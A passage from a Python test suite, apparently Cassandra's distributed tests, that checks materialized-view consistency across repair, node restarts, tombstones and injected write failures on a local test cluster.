session.execute(SimpleStatement("UPDATE t USING TIMESTAMP 4 SET v = 1 WHERE id = 1",
consistency_level=ConsistencyLevel.QUORUM))
self._replay_batchlogs()
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0]
)
node2.start(wait_for_binary_proto=True)
# We should get a digest mismatch
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1",
consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
# We should not get a digest mismatch the second time
query = SimpleStatement("SELECT * FROM t_by_v WHERE v = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
# Verify values one last time
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = 1",
[1, 1, 'b', 3.0],
cl=ConsistencyLevel.ALL
)
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
pytest.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
pytest.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows), [[i, i, 'a' == 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
def _base_replica_repair_test(self, fail_mv_lock=False):
"""
Test that a materialized view are consistent after the repair of the base replica.
"""
self.prepare(rf=3)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Write initial data')
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug('Shutdown node1')
node1.stop(wait_other_notice=True)
logger.debug('Delete node1 data')
node1.clear(clear_all=True)
jvm_args = []
if fail_mv_lock:
if self.cluster.version() >= LooseVersion('3.10'): # CASSANDRA-10134
jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
# this should not make Keyspace.apply throw WTE on failure to acquire lock
node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
logger.debug('Verify that there is no data on node1')
for i in range(1000):
assert_none(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i)
)
logger.debug('Restarting node2 and node3')
node2.start(wait_for_binary_proto=True)
node3.start(wait_for_binary_proto=True)
# Just repair the base replica
logger.debug('Starting repair on node1')
node1.nodetool("repair ks t")
logger.debug('Verify data with cl=ALL')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
@pytest.mark.resource_intensive
def test_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
"WITH gc_grace_seconds = 5")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop()
node3.stop(wait_other_notice=True)
logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
for i in range(1000):
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
logger.debug('Verify the data in the MV on node1 with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Close connection to node1')
session.cluster.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
for i in range(1000):
assert_none(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
)
logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
for i in range(1000):
# we write i*2 as value, instead of i
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
logger.debug('Verify the new data in the MV on node2 with CL=ONE')
for i in range(1000):
v = i * 2
assert_one(
session2,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0]
)
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node1)
logger.debug('Read data from MV at QUORUM (old data should be returned)')
for i in range(1000):
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
logger.debug('Read data from MV at quorum (new data should be returned after repair)')
for i in range(1000):
v = i * 2
assert_one(
session,
"SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
[v, v, 'a', 3.0],
cl=ConsistencyLevel.QUORUM
)
@pytest.mark.resource_intensive
def test_throttled_partition_update(self):
"""
@jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
Provide a configuable batch size(cassandra.mv.mutation.row.count=100) to trottle number
of rows to be applied in one mutation
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
for node in self.cluster.nodelist():
node.nodetool("disableautocompaction")
session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
"PRIMARY KEY (pk, ck2, ck1)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
size = 50
range_deletion_ts = 30
partition_deletion_ts = 10
for ck1 in range(size):
for ck2 in range(size):
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
self._replay_batchlogs()
for ck1 in range(size):
for ck2 in range(size):
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
[1, ck1, ck2, ck1, ck2])
logger.debug('Shutdown node4 and node5')
node4.stop(wait_other_notice=True)
node5.stop(wait_other_notice=True)
for ck1 in range(size):
for ck2 in range(size):
if ck1 % 2 == 0: # range tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
elif ck1 == ck2: # row tombstone
session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
# range deletion
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
# partition deletion for ck1 <= partition_deletion_ts
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
# only partition deletion for the pk=2000
session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
self._replay_batchlogs()
# start nodes with different batch size
logger.debug('Starting nodes')
node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
self._replay_batchlogs()
logger.debug('repairing base table')
node1.nodetool("repair ks t")
# insert data to the deleted partition with pk=2000, they should be considered dead
session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
" VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
self._replay_batchlogs()
logger.debug('stop cluster')
self.cluster.stop()
logger.debug('rolling restart to check repaired data on each node')
for node in self.cluster.nodelist():
logger.debug('starting {}'.format(node.name))
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
for ck1 in range(size):
for ck2 in range(size):
if (
ck1 <= partition_deletion_ts or # partition deletion
ck1 == ck2 or ck1 % 2 == 0 or # row deletion or range tombstone
(ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10) # range tombstone
):
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2))
elif ck1 == ck2 - 1: # cell tombstone
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
else:
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
"ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
# Verify partition deletion with pk=2000 has no live data
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
logger.debug('stopping {}'.format(node.name))
node.stop(wait_other_notice=True, wait_for_binary_proto=True)
@pytest.mark.resource_intensive
def test_really_complex_repair(self):
"""
Test that a materialized view are consistent after a more complex repair.
"""
session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
node1, node2, node3, node4, node5 = self.cluster.nodelist()
# we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
"WITH gc_grace_seconds = 1")
session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
"v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2 and node3')
node2.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
self._replay_batchlogs()
logger.debug('Verify the data in the MV on node1 with CL=ONE')
assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
session.shutdown()
logger.debug('Shutdown node1, node4 and node5')
node1.stop()
node4.stop()
node5.stop()
logger.debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
logger.debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
logger.debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
logger.debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
logger.debug('Start remaining nodes')
node1.start(wait_for_binary_proto=True)
node4.start(wait_for_binary_proto=True)
node5.start(wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
logger.debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
logger.debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
logger.debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
"""
The internal addition of a view over a non existing table should be ignored
@jira_ticket CASSANDRA-13737
"""
cluster = self.cluster
cluster.populate(3)
cluster.start()
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
create_ks(session, 'ks', 3)
session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')
# create a materialized view only in nodes 1 and 2
node3.stop(wait_other_notice=True)
session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
'PRIMARY KEY (state, username)'))
# drop the base table only in node 3
node1.stop(wait_other_notice=True)
node2.stop(wait_other_notice=True)
node3.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
session.execute('DROP TABLE ks.users')
# restart the cluster
cluster.stop()
cluster.start()
# node3 should have received and ignored the creation of the MV over the dropped table
assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
"""
* Fails base table write before or after applying views
* Restart node and replay commit and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit(['./byteman/fail_{}_view_write.btm'.format(fail_phase)])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a multiple partitions
